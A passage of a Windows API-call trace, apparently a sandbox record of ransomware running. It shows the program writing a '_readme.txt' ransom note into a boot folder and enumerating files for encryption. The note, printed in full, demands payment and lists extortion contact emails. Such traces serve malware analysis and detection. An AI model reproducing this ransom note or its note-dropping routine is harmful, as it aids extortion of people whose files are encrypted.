lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.562] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.563] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.563] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.564] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.565] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.565] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.566] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.566] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.567] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.567] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.568] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.568] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0178.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.568] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.568] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.568] PathFindFileNameW (pszPath="") returned="" [0178.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.568] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.569] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0178.569] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0178.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.569] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.569] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0178.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.569] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.569] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0178.569] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.569] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.569] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.570] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.570] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.571] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.571] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*" (normalized: "c:\\boot\\cs-cz\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.571] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.571] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d38220, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.572] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0178.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.572] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.572] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.572] PathFindExtensionW (pszPath="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned=".mui" [0178.572] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.573] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d38220, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0178.573] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.574] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.574] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.574] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.574] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.575] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.575] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.577] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.578] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.578] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.579] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.579] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.580] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.581] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.581] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.582] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.582] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.583] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.583] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.584] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.586] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.587] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.588] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.589] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a68 | out: hHeap=0x6a0000) returned 1 [0178.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.589] RtlAllocateHeap 